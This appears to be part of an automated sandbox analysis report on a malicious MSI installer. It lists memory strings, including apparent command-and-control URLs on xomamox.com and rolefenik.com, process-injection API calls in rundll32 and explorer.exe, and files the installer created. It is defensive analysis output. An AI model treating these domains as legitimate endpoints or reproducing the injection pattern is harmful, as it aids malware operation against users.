            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://tl.symcd.com0&
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://www.digicert.com/CPS0
            Source: explorer.exe, 0000000B.00000000.2290826677.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009237000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSA4
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSd
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000007046000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289872722.0000000007046000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866104583.000000000704B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
            Source: explorer.exe, 0000000B.00000002.3900236624.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 0000000B.00000002.3900236624.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
            Source: explorer.exe, 0000000B.00000002.3900212004.0000000008E4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/
            Source: explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
            Source: explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
            Source: explorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/
            Source: explorer.exe, 0000000B.00000002.3906622826.000000000C08D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/0
            Source: explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/=
            Source: explorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/F
            Source: explorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BDA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/:
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BDA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/O
            Source: explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/Q
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/W
            Source: explorer.exe, 0000000B.00000002.3906622826.000000000C061000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/ser-l1-1-0
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/v
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/xtMenuArray_198721XV
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000B.00000000.2294125458.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
            Source: explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: https://www.advancedinstaller.com
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: https://www.thawte.com/cps0/
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: https://www.thawte.com/repository0W
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com/
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/49
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/T
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/forest.php
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/forest.phpl
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/gump.php
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/gump.php-
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/gump.phpx
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/re
Source: unknown | HTTPS traffic detected: 172.67.191.232:443 -> 192.168.2.8:58086 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.191.232:443 -> 192.168.2.8:58097 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exe | Code function: 6_3_000001A99428D2C0 NtProtectVirtualMemory
Source: C:\Windows\System32\rundll32.exe | Code function: 6_3_000001A99428D250 NtAllocateVirtualMemory
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942A8149 NtSetContextThread
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C45F0 NtDuplicateObject
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A994291600 NtClose, RtlExitUserThread
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942A7A50 NtSetContextThread
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C4740 NtFreeVirtualMemory
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C3F40 NtAllocateVirtualMemory
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C4360 NtCreateThreadEx
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942917B0 NtClose
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C4FF0 NtQueueApcThread
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C4BE0 NtProtectVirtualMemory
Source: C:\Windows\explorer.exe | Code function: 11_2_02BE82B4 NtFreeVirtualMemory
Source: C:\Windows\explorer.exe | Code function: 11_2_02BEB388 NtAllocateVirtualMemory
Source: C:\Windows\explorer.exe | Code function: 11_2_02BEC704 NtDelayExecution
Source: C:\Windows\explorer.exe | Code function: 11_2_02BE80B8 RtlInitUnicodeString, NtCreateFile
Source: C:\Windows\explorer.exe | Code function: 11_2_02BE8240 NtClose
Source: C:\Windows\explorer.exe | Code function: 11_2_02BF01A0 NtFreeVirtualMemory
Source: C:\Windows\explorer.exe | Code function: 11_2_02BF01E0 NtQuerySystemInformation, NtDelayExecution
Source: C:\Windows\explorer.exe | Code function: 11_2_02BF01D0 NtWriteFile
Source: C:\Windows\explorer.exe | Code function: 11_2_02BE81C8 NtWriteFile
Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0130 NtAllocateVirtualMemory
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\5d243d.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2527.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2586.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI25B6.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI25D6.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2635.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2701.tmp
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI2527.tmp
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004C6A50
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004FF032
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004EE270
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004EC2CA
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004F92A9
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004F84BD
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004EA587
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004CC870
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004FD8D5
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004EA915
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004E4920
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004F0A48
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004C9CC0
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004F5D6D
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000EC30
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800F2C34
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800E1D20
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800E317C
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800E358C
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800E399C
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800DB5E8
